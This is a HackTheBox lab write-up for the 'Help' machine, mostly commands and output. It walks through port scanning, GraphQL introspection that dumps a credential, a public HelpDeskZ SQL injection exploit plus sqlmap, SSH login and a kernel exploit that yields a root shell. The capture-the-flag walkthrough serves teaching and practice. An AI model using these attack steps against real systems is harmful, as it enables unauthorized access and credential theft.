Help
#Linux #SQLi #API
Help is an easy-rated Linux machine from HackTheBox created by cymtrick. In the current post, my IP is 10.10.14.23, and the target’s IP is 10.129.227.176
I assume that the machine is pretty random, with the version obtainable only by a "readme", that you know about it existence from git... the url vulnerable to sqli is really hidden, I didn't like this maachine at all.
Recon
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n
Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 128
80/tcp open http syn-ack ttl 128
3000/tcp open ppp syn-ack ttl 128
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)nmap -sCV -p 22,80 10.129.227.176 -oN Target
Nmap scan report for 10.129.227.176
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelwhatweb help.htb
http://help.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.227.176],
Title[Apache2 Ubuntu Default Page: It works]Browser: http://help.htb
At this point we have nothing, it just a web site with the default index, from this point the best option is to FUZZ the target.
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt help.htb/FUZZ********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://help.htb/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000041: 301 9 L 28 W 306 Ch "support"
000001059: 301 9 L 28 W 309 Ch "javascript""Support" and "JavaScript", virtually there is nothing, let's explore another port
We don't have any credentials or tools to use here...
Port 3000
All right, this looks like a taunt, let's extract more information
$ curl -v http://help.htb:3000/
* Trying 10.129.227.176:3000...
* Connected to help.htb (10.129.227.176) port 3000 (#0)
> GET / HTTP/1.1
> Host: help.htb:3000
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Content-Type: application/json; charset=utf-8
< Content-Length: 81
< ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
< Date: Sun, 09 Jul 2023 15:23:28 GMT
< Connection: keep-alive
<
* Connection #0 to host help.htb left intact
{"message":"Hi Shiv, To get access please find the credentials with given query"} Nothing from curl, maybe we should fuzz it with a wordlist specific for API.
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/api.txt help.htb:3000FUZZ********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://help.htb:3000FUZZ/
Total requests: 584
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000215: 400 0 L 3 W 18 Ch "/graphql"
000000216: 400 0 L 3 W 18 Ch "/graphql/console"
Total time: 0
Processed Requests: 562
Filtered Requests: 560
Requests/sec.: 0So, there is a GraphQL running at the API, now we have to work with specific exploits.
└─# curl -s http://help.htb:3000/graphql
GET query missing.Usually Graphql is exploitable with POST, so intercept with Burpsuite, change the request method, add the line "Content-Type: application/json" and apply the first suggested payload
It works, and you can do the same with Curl
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}
We know that there is a "User" around, so we want now to dump it.
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .{
"data": {
"__type": {
"name": "User",
"fields": [
{
"name": "username"
},
{
"name": "password"
}
]
}
}
}curl -s http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .{
"data": {
"user": {
"username": "helpme@helpme.com",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}And we found an email and a password, this should work for at other website, but first we need to thecrypt the password.
Exploitation
Reverse Shell (Help)
After exploring the website and testing the ticket system, I found nothing... let's just search about "HelpDeskZ Github"
searchsploit HelpDeskZ
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------searchsploit -m 41200.pyEdit the python script and add at the first line: #-- coding: utf-8 --
And at line 94, change to session = requests.session()
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz
------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment
Ok, we need to submit another ticket with a file, and then execute the exploit again and wait.
At the end, it does not work, but at least now we know the URL where the injection happens.
Intercept the downloading process of a file, and save the request (saved as request).
Now execute sqlmap to extract the password.
sqlmap -r request --level 5 --risk 3 -p param[]We have the hash, slq1, after decrypt the password is { Welcome1 }, login through ssh to the machine.
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz
------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment
$ ssh -l help 10.129.227.176 # Password: Welcome1
$ cat user.txt
4dbb347ce71e1f06251894265c3bdb90Privileges Escalation
We have the first flag, now we do some basic test for escalation
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help@help:~$ sudo -l
[sudo] password for help:
Sorry, user help may not run sudo on help.
help@help:~$ cd /
help@help:/$ find / -perm -4000 2>/dev/null
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
<...>
help@help:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.5 LTS
Release: 16.04
Codename: xenial
help@help:/$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/LinuxWe found an unusually old version at "uname -a", after searching for "Linux Kernel 4.4.0-116" at exploitDB we found something.
Copy the script as "exploit.c" at tmp (paste using nano), and then compile with the command gcc -o attack exploit.c
help@help:/tmp$ ./attack
task_struct = ffff88003ba2aa80
uidptr = ffff88003ab0e184
spawning root shell
root@help:/tmp# cat /root/root.txt
62106a044573c82858c99023794af117Last updated